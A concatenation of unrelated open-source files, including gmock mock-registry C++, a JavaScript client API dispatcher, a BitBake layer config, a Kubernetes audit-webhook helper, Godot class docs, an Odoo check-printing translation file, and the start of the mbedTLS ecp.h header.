// We don't clear the content of mockers, as they may still be
// needed by ClearDefaultActionsLocked().
return expectations_met;
}
// Registers a mock object and a mock method it owns.
void Mock::Register(const void* mock_obj,
internal::UntypedFunctionMockerBase* mocker)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
g_mock_object_registry.states()[mock_obj].function_mockers.insert(mocker);
}
// Tells Google Mock where in the source code mock_obj is used in an
// ON_CALL or EXPECT_CALL. In case mock_obj is leaked, this
// information helps the user identify which object it is.
void Mock::RegisterUseByOnCallOrExpectCall(const void* mock_obj,
const char* file, int line)
GTEST_LOCK_EXCLUDED_(internal::g_gmock_mutex) {
internal::MutexLock l(&internal::g_gmock_mutex);
MockObjectState& state = g_mock_object_registry.states()[mock_obj];
if (state.first_used_file == NULL) {
state.first_used_file = file;
state.first_used_line = line;
const TestInfo* const test_info =
UnitTest::GetInstance()->current_test_info();
if (test_info != NULL) {
// TODO([email protected]): record the test case name when the
// ON_CALL or EXPECT_CALL is invoked from SetUpTestCase() or
// TearDownTestCase().
state.first_used_test_case = test_info->test_case_name();
state.first_used_test = test_info->name();
}
}
}
// Unregisters a mock method; removes the owning mock object from the
// registry when the last mock method associated with it has been
// unregistered. This is called only in the destructor of
// FunctionMockerBase.
void Mock::UnregisterLocked(internal::UntypedFunctionMockerBase* mocker)
GTEST_EXCLUSIVE_LOCK_REQUIRED_(internal::g_gmock_mutex) {
internal::g_gmock_mutex.AssertHeld();
for (MockObjectRegistry::StateMap::iterator it =
g_mock_object_registry.states().begin();
it != g_mock_object_registry.states().end(); ++it) {
FunctionMockers& mockers = it->second.function_mockers;
if (mockers.erase(mocker) > 0) {
      // mocker was in mockers and has just been removed.
if (mockers.empty()) {
g_mock_object_registry.states().erase(it);
}
return;
}
}
}
// Clears all ON_CALL()s set on the given mock object.
void Mock::ClearDefaultActionsLocked(void* mock_obj)
GTEST_EXCLUSIVE_LOCK_REQUIRED_(internal::g_gmock_mutex) {
internal::g_gmock_mutex.AssertHeld();
if (g_mock_object_registry.states().count(mock_obj) == 0) {
// No ON_CALL() was set on the given mock object.
return;
}
// Clears the default actions for each mock method in the given mock
// object.
FunctionMockers& mockers =
g_mock_object_registry.states()[mock_obj].function_mockers;
for (FunctionMockers::const_iterator it = mockers.begin();
it != mockers.end(); ++it) {
(*it)->ClearDefaultActionsLocked();
}
// We don't clear the content of mockers, as they may still be
// needed by VerifyAndClearExpectationsLocked().
}
Expectation::Expectation() {}
Expectation::Expectation(
const internal::linked_ptr<internal::ExpectationBase>& an_expectation_base)
: expectation_base_(an_expectation_base) {}
Expectation::~Expectation() {}
// Adds an expectation to a sequence.
void Sequence::AddExpectation(const Expectation& expectation) const {
if (*last_expectation_ != expectation) {
if (last_expectation_->expectation_base() != NULL) {
expectation.expectation_base()->immediate_prerequisites_
+= *last_expectation_;
}
*last_expectation_ = expectation;
}
}
// Creates the implicit sequence if there isn't one.
InSequence::InSequence() {
if (internal::g_gmock_implicit_sequence.get() == NULL) {
internal::g_gmock_implicit_sequence.set(new Sequence);
sequence_created_ = true;
} else {
sequence_created_ = false;
}
}
// Deletes the implicit sequence if it was created by the constructor
// of this object.
InSequence::~InSequence() {
if (sequence_created_) {
delete internal::g_gmock_implicit_sequence.get();
internal::g_gmock_implicit_sequence.set(NULL);
}
}
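// Illustrative sketch (MockTurtle is hypothetical): every EXPECT_CALL made
// while an InSequence object is alive joins the implicit sequence it created,
// so the expected calls must occur in the order they are written.
//
//   {
//     InSequence seq;
//     EXPECT_CALL(turtle, PenDown());
//     EXPECT_CALL(turtle, Forward(100));
//     EXPECT_CALL(turtle, PenUp());
//   }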
} // namespace testing
| {
"pile_set_name": "Github"
} |
import registerExtension from './RegisterExtension';
import registerDomain from './RegisterDomain';
import account from './Account';
import user from './Account/user';
import users from './Account/users';
import encryptMessage from './Account/encrypt';
import decryptMessage from './Account/decrypt';
import prove from './Prove';
import asset from './Asset';
import assetBalance from './Asset/getBalance';
import fetchNotesFromBalance from './Asset/fetchNotesFromBalance';
import fetchTransactions from './Asset/fetchTransactions';
import note from './Note';
import noteWithViewingKey from './Note/exportViewingKey';
import grantNoteAccess from './Note/grantNoteAccess';
import validateParameters from './middlewares/validateParameters';
import validateRequest from './middlewares/validateRequest';
const apis = {
registerExtension,
registerDomain,
account,
user,
users,
encryptMessage,
decryptMessage,
asset,
assetBalance,
fetchNotesFromBalance,
fetchTransactions,
note,
noteWithViewingKey,
grantNoteAccess,
constructProof: prove,
};
const clientApi = async (request, connection) => {
// TODO move all auth here
const {
data: {
query,
args,
},
} = request;
const invalidParamsResp = validateParameters(query, args);
if (invalidParamsResp) {
return {
...request,
data: invalidParamsResp,
};
}
const invalidRequestResp = await validateRequest(query, args);
if (invalidRequestResp) {
return {
...request,
data: invalidRequestResp,
};
}
const data = await apis[query](request, connection);
return {
...request,
data: query === 'constructProof'
? { data }
: data,
};
};
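// A hedged sketch of the expected request shape (the query name comes from
// the `apis` map above; the args payload is hypothetical):
//
//   const response = await clientApi({
//     data: {
//       query: 'assetBalance',
//       args: { assetAddress: '0x...' },
//     },
//   }, connection);
//   // `response.data` holds either a validation error or the api result.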
const uiApi = async (request) => {
const {
data: {
query,
},
} = request;
const data = await apis[query](request);
return {
...request,
response: data,
};
};
const apiExists = query => !!apis[query];
export default {
clientApi,
uiApi,
apiExists,
};
| {
"pile_set_name": "Github"
} |
# We have a conf and classes directory, add to BBPATH
BBPATH .= ":${LAYERDIR}"
# We have recipes-* directories, add to BBFILES
BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
${LAYERDIR}/recipes-*/*/*.bbappend"
BBFILE_COLLECTIONS += "olympus-layer"
BBFILE_PATTERN_olympus-layer = "^${LAYERDIR}/"
BBFILE_PRIORITY_olympus-layer = "6"
LAYERSERIES_COMPAT_olympus-layer = "warrior"
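# A hedged sketch (the path is hypothetical) of how a build enables this
# layer from its conf/bblayers.conf:
#   BBLAYERS += "/path/to/meta-olympus"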
| {
"pile_set_name": "Github"
} |
---
title: "purevpn"
layout: cask
---
{{ content }}
| {
"pile_set_name": "Github"
} |
/*
Copyright 2018 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package util
import (
"k8s.io/api/auditregistration/v1alpha1"
"k8s.io/apiserver/pkg/util/webhook"
)
// HookClientConfigForSink constructs a webhook.ClientConfig using a v1alpha1.AuditSink API object.
// webhook.ClientConfig is used to create a HookClient and the purpose of the config struct is to
// share that with other packages that need to create a HookClient.
func HookClientConfigForSink(a *v1alpha1.AuditSink) webhook.ClientConfig {
c := a.Spec.Webhook.ClientConfig
ret := webhook.ClientConfig{Name: a.Name, CABundle: c.CABundle}
if c.URL != nil {
ret.URL = *c.URL
}
if c.Service != nil {
ret.Service = &webhook.ClientConfigService{
Name: c.Service.Name,
Namespace: c.Service.Namespace,
}
if c.Service.Port != nil {
ret.Service.Port = *c.Service.Port
} else {
ret.Service.Port = 443
}
if c.Service.Path != nil {
ret.Service.Path = *c.Service.Path
}
}
return ret
}
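// Illustrative sketch (the field values are hypothetical) of the service-port
// defaulting behaviour above; a nil Port would fall back to 443:
//
//	port := int32(8443)
//	sink := &v1alpha1.AuditSink{
//		Spec: v1alpha1.AuditSinkSpec{
//			Webhook: v1alpha1.Webhook{
//				ClientConfig: v1alpha1.WebhookClientConfig{
//					Service: &v1alpha1.ServiceReference{Name: "audit", Namespace: "kube-system", Port: &port},
//				},
//			},
//		},
//	}
//	cfg := HookClientConfigForSink(sink) // cfg.Service.Port == 8443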
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" ?>
<class name="AnimationNodeBlendSpace2D" inherits="AnimationRootNode" version="4.0">
<brief_description>
Blends linearly between three [AnimationNode] of any type placed in a 2D space.
</brief_description>
<description>
A resource to add to an [AnimationNodeBlendTree].
This node allows you to blend linearly between three animations using a [Vector2] weight.
		You can add vertices to the blend space with [method add_blend_point] and automatically triangulate it by setting [member auto_triangles] to [code]true[/code]. Otherwise, use [method add_triangle] and [method remove_triangle] to build the blend space by hand.
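		A minimal illustrative snippet (the blend points are created empty here; in practice you would assign animations to them in the editor or by code):
		[codeblock]
		var blend_space = AnimationNodeBlendSpace2D.new()
		blend_space.add_blend_point(AnimationNodeAnimation.new(), Vector2(-1, 0))
		blend_space.add_blend_point(AnimationNodeAnimation.new(), Vector2(1, 0))
		blend_space.add_blend_point(AnimationNodeAnimation.new(), Vector2(0, 1))
		[/codeblock]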
</description>
<tutorials>
<link title="AnimationTree">https://docs.godotengine.org/en/latest/tutorials/animation/animation_tree.html</link>
</tutorials>
<methods>
<method name="add_blend_point">
<return type="void">
</return>
<argument index="0" name="node" type="AnimationRootNode">
</argument>
<argument index="1" name="pos" type="Vector2">
</argument>
<argument index="2" name="at_index" type="int" default="-1">
</argument>
<description>
Adds a new point that represents a [code]node[/code] at the position set by [code]pos[/code]. You can insert it at a specific index using the [code]at_index[/code] argument. If you use the default value for [code]at_index[/code], the point is inserted at the end of the blend points array.
</description>
</method>
<method name="add_triangle">
<return type="void">
</return>
<argument index="0" name="x" type="int">
</argument>
<argument index="1" name="y" type="int">
</argument>
<argument index="2" name="z" type="int">
</argument>
<argument index="3" name="at_index" type="int" default="-1">
</argument>
<description>
Creates a new triangle using three points [code]x[/code], [code]y[/code], and [code]z[/code]. Triangles can overlap. You can insert the triangle at a specific index using the [code]at_index[/code] argument. If you use the default value for [code]at_index[/code], the point is inserted at the end of the blend points array.
</description>
</method>
<method name="get_blend_point_count" qualifiers="const">
<return type="int">
</return>
<description>
Returns the number of points in the blend space.
</description>
</method>
<method name="get_blend_point_node" qualifiers="const">
<return type="AnimationRootNode">
</return>
<argument index="0" name="point" type="int">
</argument>
<description>
Returns the [AnimationRootNode] referenced by the point at index [code]point[/code].
</description>
</method>
<method name="get_blend_point_position" qualifiers="const">
<return type="Vector2">
</return>
<argument index="0" name="point" type="int">
</argument>
<description>
Returns the position of the point at index [code]point[/code].
</description>
</method>
<method name="get_triangle_count" qualifiers="const">
<return type="int">
</return>
<description>
Returns the number of triangles in the blend space.
</description>
</method>
<method name="get_triangle_point">
<return type="int">
</return>
<argument index="0" name="triangle" type="int">
</argument>
<argument index="1" name="point" type="int">
</argument>
<description>
Returns the position of the point at index [code]point[/code] in the triangle of index [code]triangle[/code].
</description>
</method>
<method name="remove_blend_point">
<return type="void">
</return>
<argument index="0" name="point" type="int">
</argument>
<description>
Removes the point at index [code]point[/code] from the blend space.
</description>
</method>
<method name="remove_triangle">
<return type="void">
</return>
<argument index="0" name="triangle" type="int">
</argument>
<description>
Removes the triangle at index [code]triangle[/code] from the blend space.
</description>
</method>
<method name="set_blend_point_node">
<return type="void">
</return>
<argument index="0" name="point" type="int">
</argument>
<argument index="1" name="node" type="AnimationRootNode">
</argument>
<description>
Changes the [AnimationNode] referenced by the point at index [code]point[/code].
</description>
</method>
<method name="set_blend_point_position">
<return type="void">
</return>
<argument index="0" name="point" type="int">
</argument>
<argument index="1" name="pos" type="Vector2">
</argument>
<description>
Updates the position of the point at index [code]point[/code] on the blend axis.
</description>
</method>
</methods>
<members>
<member name="auto_triangles" type="bool" setter="set_auto_triangles" getter="get_auto_triangles" default="true">
If [code]true[/code], the blend space is triangulated automatically. The mesh updates every time you add or remove points with [method add_blend_point] and [method remove_blend_point].
</member>
<member name="blend_mode" type="int" setter="set_blend_mode" getter="get_blend_mode" enum="AnimationNodeBlendSpace2D.BlendMode" default="0">
Controls the interpolation between animations. See [enum BlendMode] constants.
</member>
<member name="max_space" type="Vector2" setter="set_max_space" getter="get_max_space" default="Vector2( 1, 1 )">
The blend space's X and Y axes' upper limit for the points' position. See [method add_blend_point].
</member>
<member name="min_space" type="Vector2" setter="set_min_space" getter="get_min_space" default="Vector2( -1, -1 )">
The blend space's X and Y axes' lower limit for the points' position. See [method add_blend_point].
</member>
<member name="snap" type="Vector2" setter="set_snap" getter="get_snap" default="Vector2( 0.1, 0.1 )">
Position increment to snap to when moving a point.
</member>
<member name="x_label" type="String" setter="set_x_label" getter="get_x_label" default=""x"">
Name of the blend space's X axis.
</member>
<member name="y_label" type="String" setter="set_y_label" getter="get_y_label" default=""y"">
Name of the blend space's Y axis.
</member>
</members>
<signals>
<signal name="triangles_updated">
<description>
Emitted every time the blend space's triangles are created, removed, or when one of their vertices changes position.
</description>
</signal>
</signals>
<constants>
<constant name="BLEND_MODE_INTERPOLATED" value="0" enum="BlendMode">
The interpolation between animations is linear.
</constant>
<constant name="BLEND_MODE_DISCRETE" value="1" enum="BlendMode">
The blend space plays the animation of the node the blending position is closest to. Useful for frame-by-frame 2D animations.
</constant>
<constant name="BLEND_MODE_DISCRETE_CARRY" value="2" enum="BlendMode">
Similar to [constant BLEND_MODE_DISCRETE], but starts the new animation at the last animation's playback position.
</constant>
</constants>
</class>
| {
"pile_set_name": "Github"
} |
open Common
(* still needed? *)
open Eliom_pervasives
module Db = Database_php
module HC = Highlight_code
module H = HTML5.M
(*****************************************************************************)
(* Prelude *)
(*****************************************************************************)
(*
* The goal of this module is to provide a code browser a la LXR.
* See http://lxr.linux.no/#linux+v2.6.37.1/mm/compaction.c as an
* example.
*
* It's also an exercise in learning ocsigen. A code browser does
* not require anything fancy like Depot. No need for a ORM,
* or forms. Just need to htmlize a source file and add
* hrefs into it to make it hypertextable.
*
* todo: add search, add nice html, add fast html
*
* alternatives:
* - http://en.wikipedia.org/wiki/LXR_Cross_Referencer
* - http://en.wikipedia.org/wiki/OpenGrok
* - https://wiki.mozilla.org/DXR
*
*)
(*****************************************************************************)
(* Helpers *)
(*****************************************************************************)
let htmlize_dir ~link dir db =
let subdirs = Common.readdir_to_dir_list dir +> Common.sort in
let files = Common.readdir_to_file_list dir +> Common.sort in
let files = files +> Common.exclude (fun file ->
let (d,b,e) = Common.dbe_of_filename_noext_ok file in
e = "git_annot" || e = "cm_cache"
)
in
let elements = subdirs ++ files in
(H.html (*~a:[H.a_xmlns `W3_org_1999_xhtml; H.a_xml_lang "en"]*)
(H.head
(H.title (H.pcdata "XHTML"))
[
H.style [H.pcdata Htmlize_php2.style ]
])
(H.body
((H.h1 [H.pcdata dir] )
::
(elements +> List.map (fun subelement ->
let fullpath = Filename.concat dir subelement in
let readable = Db.absolute_to_readable_filename fullpath db in
[(*H.h3 [H.pcdata subelement]; *)
H.h1 [
Eliom_output.Html5.a link [H.pcdata readable] readable;
];
(* H.pre [H.pcdata readable]; *)
]
) +> List.flatten)
)
)
)
(*****************************************************************************)
(* Main entry point *)
(*****************************************************************************)
let main_service =
Eliom_services.service ["lxr"] (Eliom_parameters.string "path") ()
let _ = Eliom_output.Html5.register main_service
(fun readable_path () ->
(* todo? sanitized path ? *)
let path = Db.readable_to_absolute_filename readable_path Global_db.db in
let hook_token s tok categ =
match categ with
| Some (HC.Function (HC.Use2 _)) ->
(try
let id = Db.id_of_function s Global_db.db in
let file = Db.readable_filename_of_id id Global_db.db in
Eliom_output.Html5.a main_service [H.pcdata s] file
with (Not_found | Multi_found) as exn ->
Eliom_output.Html5.a main_service [H.pcdata s]
(Common.exn_to_s exn)
)
| _ -> H.pcdata s
in
let html =
if Common.is_directory path
then htmlize_dir ~link:main_service path Global_db.db
else Htmlize_php2.htmlize_with_headers ~hook_token path Global_db.db
in
Lwt.return html
)
| {
"pile_set_name": "Github"
} |
# Translation of Odoo Server.
# This file contains the translation of the following modules:
# * account_check_printing
#
# Translators:
# Martin Trigaux <[email protected]>, 2017
msgid ""
msgstr ""
"Project-Id-Version: Odoo Server 10.saas~18\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2017-09-20 09:53+0000\n"
"PO-Revision-Date: 2017-09-20 09:53+0000\n"
"Last-Translator: Martin Trigaux <[email protected]>, 2017\n"
"Language-Team: Faroese (https://www.transifex.com/odoo/teams/41243/fo/)\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: \n"
"Language: fo\n"
"Plural-Forms: nplurals=2; plural=(n != 1);\n"
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_journal.py:58
#, python-format
msgid " : Check Number Sequence"
msgstr ""
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_payment.py:69
#, python-format
msgid "A check memo cannot exceed 60 characters."
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_account_payment_check_amount_in_words
#: model:ir.model.fields,field_description:account_check_printing.field_account_register_payments_check_amount_in_words
msgid "Amount in Words"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.print_pre_numbered_checks_view
msgid "Cancel"
msgstr "Strika"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_account_payment_check_number
#: model:ir.model.fields,field_description:account_check_printing.field_account_register_payments_check_number
msgid "Check Number"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.view_account_journal_form_inherited
msgid "Check Printing"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_account_journal_check_printing_payment_method_selected
msgid "Check Printing Payment Method Selected"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_account_journal_check_sequence_id
msgid "Check Sequence"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,help:account_check_printing.field_account_journal_check_manual_sequencing
#: model:ir.model.fields,help:account_check_printing.field_account_payment_check_manual_sequencing
#: model:ir.model.fields,help:account_check_printing.field_account_register_payments_check_manual_sequencing
msgid "Check this option if your pre-printed checks are not numbered."
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.account_journal_dashboard_kanban_view_inherited
msgid "Check to print"
msgstr ""
#. module: account_check_printing
#: model:account.payment.method,name:account_check_printing.account_payment_method_check
msgid "Checks"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.view_payment_check_printing_search
msgid "Checks To Print"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,help:account_check_printing.field_account_journal_check_sequence_id
msgid "Checks numbering sequence."
msgstr ""
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_journal.py:97
#, python-format
msgid "Checks to Print"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.account_journal_dashboard_kanban_view_inherited
msgid "Checks to print"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_create_uid
msgid "Created by"
msgstr "Byrjað av"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_create_date
msgid "Created on"
msgstr "Byrjað tann"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_display_name
msgid "Display Name"
msgstr "Vís navn"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_id
msgid "ID"
msgstr "ID"
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_payment.py:89
#, python-format
msgid ""
"In order to print multiple checks at once, they must belong to the same bank"
" journal."
msgstr ""
#. module: account_check_printing
#: model:ir.model,name:account_check_printing.model_account_journal
msgid "Journal"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks___last_update
msgid "Last Modified on"
msgstr "Seinast rættað tann"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_write_uid
msgid "Last Updated by"
msgstr "Seinast dagført av"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_write_date
msgid "Last Updated on"
msgstr "Seinast dagført tann"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_account_journal_check_manual_sequencing
#: model:ir.model.fields,field_description:account_check_printing.field_account_payment_check_manual_sequencing
#: model:ir.model.fields,field_description:account_check_printing.field_account_register_payments_check_manual_sequencing
msgid "Manual Numbering"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.view_account_bank_journal_form_inherited_check_printing
msgid "Manual Numbering of check"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_account_journal_check_next_number
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_next_check_number
msgid "Next Check Number"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,help:account_check_printing.field_account_register_payments_check_number
msgid ""
"Number of the check corresponding to this payment. If your pre-printed check"
" are not already numbered, you can manage the numbering in the journal "
"configuration page."
msgstr ""
#. module: account_check_printing
#: model:ir.model,name:account_check_printing.model_account_payment
msgid "Payments"
msgstr ""
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_payment.py:86
#, python-format
msgid ""
"Payments to print as a checks must have 'Check' selected as payment method "
"and not have already been reconciled"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.print_pre_numbered_checks_view
msgid ""
"Please enter the number of the first pre-printed check that you are about to"
" print on."
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.print_pre_numbered_checks_view
msgid "Print"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.view_account_payment_form_inherited
msgid "Print Check"
msgstr ""
#. module: account_check_printing
#: model:ir.actions.server,name:account_check_printing.action_account_print_checks
msgid "Print Checks"
msgstr ""
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_payment.py:99
#: model:ir.model,name:account_check_printing.model_print_prenumbered_checks
#: model_terms:ir.ui.view,arch_db:account_check_printing.print_pre_numbered_checks_view
#, python-format
msgid "Print Pre-numbered Checks"
msgstr ""
#. module: account_check_printing
#: model:ir.model,name:account_check_printing.model_account_register_payments
msgid "Register payments on multiple invoices"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,help:account_check_printing.field_account_journal_check_next_number
msgid "Sequence number of the next printed check."
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,help:account_check_printing.field_account_journal_check_printing_payment_method_selected
msgid ""
"Technical feature used to know whether check printing was enabled as payment"
" method."
msgstr ""
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_journal.py:26
#, python-format
msgid ""
"The last check number was %s. In order to avoid a check being rejected by "
"the bank, you can only use a greater number."
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,help:account_check_printing.field_account_payment_check_number
msgid ""
"The selected journal is configured to print check numbers. If your pre-"
"printed check paper already has numbers or if the current numbering is "
"wrong, you can change it in the journal configuration page."
msgstr ""
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_payment.py:121
#, python-format
msgid ""
"There is no check layout configured.\n"
"Make sure the proper check printing module is installed and its configuration (in company settings > 'Configuration' tab) is correct."
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.print_pre_numbered_checks_view
msgid ""
"This will allow to save on payments the number of the corresponding check."
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.view_account_payment_form_inherited
msgid "Unmark Sent"
msgstr ""
#. module: account_check_printing
#: model:ir.model,name:account_check_printing.model_wizard_multi_charts_accounts
msgid "wizard.multi.charts.accounts"
msgstr ""
| {
"pile_set_name": "Github"
} |
namespace Microsoft.Azure.Devices.Applications.PredictiveMaintenance.Web
{
using System.Web.Mvc;
public class FilterConfig
{
public static void RegisterGlobalFilters(GlobalFilterCollection filters)
{
filters.Add(new HandleErrorAttribute());
}
}
} | {
"pile_set_name": "Github"
} |
/**
* \file ecp.h
*
* \brief This file provides an API for Elliptic Curves over GF(P) (ECP).
*
* The use of ECP in cryptography and TLS is defined in
* <em>Standards for Efficient Cryptography Group (SECG): SEC1
* Elliptic Curve Cryptography</em> and
* <em>RFC-4492: Elliptic Curve Cryptography (ECC) Cipher Suites
* for Transport Layer Security (TLS)</em>.
*
* <em>RFC-2409: The Internet Key Exchange (IKE)</em> defines ECP
* group types.
*
*/
/*
* Copyright (C) 2006-2018, Arm Limited (or its affiliates), All Rights Reserved
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* This file is part of Mbed TLS (https://tls.mbed.org)
*/
#ifndef MBEDTLS_ECP_H
#define MBEDTLS_ECP_H
#include "bignum.h"
/*
* ECP error codes
*/
#define MBEDTLS_ERR_ECP_BAD_INPUT_DATA -0x4F80 /**< Bad input parameters to function. */
#define MBEDTLS_ERR_ECP_BUFFER_TOO_SMALL -0x4F00 /**< The buffer is too small to write to. */
#define MBEDTLS_ERR_ECP_FEATURE_UNAVAILABLE -0x4E80 /**< The requested feature is not available, for example, the requested curve is not supported. */
#define MBEDTLS_ERR_ECP_VERIFY_FAILED -0x4E00 /**< The signature is not valid. */
#define MBEDTLS_ERR_ECP_ALLOC_FAILED -0x4D80 /**< Memory allocation failed. */
#define MBEDTLS_ERR_ECP_RANDOM_FAILED -0x4D00 /**< Generation of random value, such as ephemeral key, failed. */
#define MBEDTLS_ERR_ECP_INVALID_KEY -0x4C80 /**< Invalid private or public key. */
#define MBEDTLS_ERR_ECP_SIG_LEN_MISMATCH -0x4C00 /**< The buffer contains a valid signature followed by more data. */
#define MBEDTLS_ERR_ECP_HW_ACCEL_FAILED -0x4B80 /**< The ECP hardware accelerator failed. */
#ifdef __cplusplus
extern "C" {
#endif
/**
* Domain-parameter identifiers: curve, subgroup, and generator.
*
* \note Only curves over prime fields are supported.
*
* \warning This library does not support validation of arbitrary domain
* parameters. Therefore, only standardized domain parameters from trusted
* sources should be used. See mbedtls_ecp_group_load().
*/
typedef enum
{
MBEDTLS_ECP_DP_NONE = 0, /*!< Curve not defined. */
MBEDTLS_ECP_DP_SECP192R1, /*!< Domain parameters for the 192-bit curve defined by FIPS 186-4 and SEC1. */
MBEDTLS_ECP_DP_SECP224R1, /*!< Domain parameters for the 224-bit curve defined by FIPS 186-4 and SEC1. */
MBEDTLS_ECP_DP_SECP256R1, /*!< Domain parameters for the 256-bit curve defined by FIPS 186-4 and SEC1. */
MBEDTLS_ECP_DP_SECP384R1, /*!< Domain parameters for the 384-bit curve defined by FIPS 186-4 and SEC1. */
MBEDTLS_ECP_DP_SECP521R1, /*!< Domain parameters for the 521-bit curve defined by FIPS 186-4 and SEC1. */
MBEDTLS_ECP_DP_BP256R1, /*!< Domain parameters for 256-bit Brainpool curve. */
MBEDTLS_ECP_DP_BP384R1, /*!< Domain parameters for 384-bit Brainpool curve. */
MBEDTLS_ECP_DP_BP512R1, /*!< Domain parameters for 512-bit Brainpool curve. */
MBEDTLS_ECP_DP_CURVE25519, /*!< Domain parameters for Curve25519. */
MBEDTLS_ECP_DP_SECP192K1, /*!< Domain parameters for 192-bit "Koblitz" curve. */
MBEDTLS_ECP_DP_SECP224K1, /*!< Domain parameters for 224-bit "Koblitz" curve. */
MBEDTLS_ECP_DP_SECP256K1, /*!< Domain parameters for 256-bit "Koblitz" curve. */
MBEDTLS_ECP_DP_CURVE448, /*!< Domain parameters for Curve448. */
} mbedtls_ecp_group_id;
/**
* The number of supported curves, plus one for #MBEDTLS_ECP_DP_NONE.
*
* \note Montgomery curves are currently excluded.
*/
#define MBEDTLS_ECP_DP_MAX 12
/**
* Curve information, for use by other modules.
*/
typedef struct mbedtls_ecp_curve_info
{
mbedtls_ecp_group_id grp_id; /*!< An internal identifier. */
uint16_t tls_id; /*!< The TLS NamedCurve identifier. */
uint16_t bit_size; /*!< The curve size in bits. */
const char *name; /*!< A human-friendly name. */
} mbedtls_ecp_curve_info;
/**
* \brief The ECP point structure, in Jacobian coordinates.
*
* \note All functions expect and return points satisfying
* the following condition: <code>Z == 0</code> or
* <code>Z == 1</code>. Other values of \p Z are
* used only by internal functions.
* The point is zero, or "at infinity", if <code>Z == 0</code>.
* Otherwise, \p X and \p Y are its standard (affine)
* coordinates.
*/
typedef struct mbedtls_ecp_point
{
mbedtls_mpi X; /*!< The X coordinate of the ECP point. */
mbedtls_mpi Y; /*!< The Y coordinate of the ECP point. */
mbedtls_mpi Z; /*!< The Z coordinate of the ECP point. */
}
mbedtls_ecp_point;
#if !defined(MBEDTLS_ECP_ALT)
/*
* default mbed TLS elliptic curve arithmetic implementation
*
* (in case MBEDTLS_ECP_ALT is defined then the developer has to provide an
* alternative implementation for the whole module and it will replace this
* one.)
*/
/**
* \brief The ECP group structure.
*
* We consider two types of curve equations:
* <ul><li>Short Weierstrass: <code>y^2 = x^3 + A x + B mod P</code>
* (SEC1 + RFC-4492)</li>
* <li>Montgomery: <code>y^2 = x^3 + A x^2 + x mod P</code> (Curve25519,
* Curve448)</li></ul>
* In both cases, the generator (\p G) for a prime-order subgroup is fixed.
*
* For Short Weierstrass, this subgroup is the whole curve, and its
* cardinality is denoted by \p N. Our code requires that \p N is an
* odd prime as mbedtls_ecp_mul() requires an odd number, and
* mbedtls_ecdsa_sign() requires that it is prime for blinding purposes.
*
* For Montgomery curves, we do not store \p A, but <code>(A + 2) / 4</code>,
* which is the quantity used in the formulas. Additionally, \p nbits is
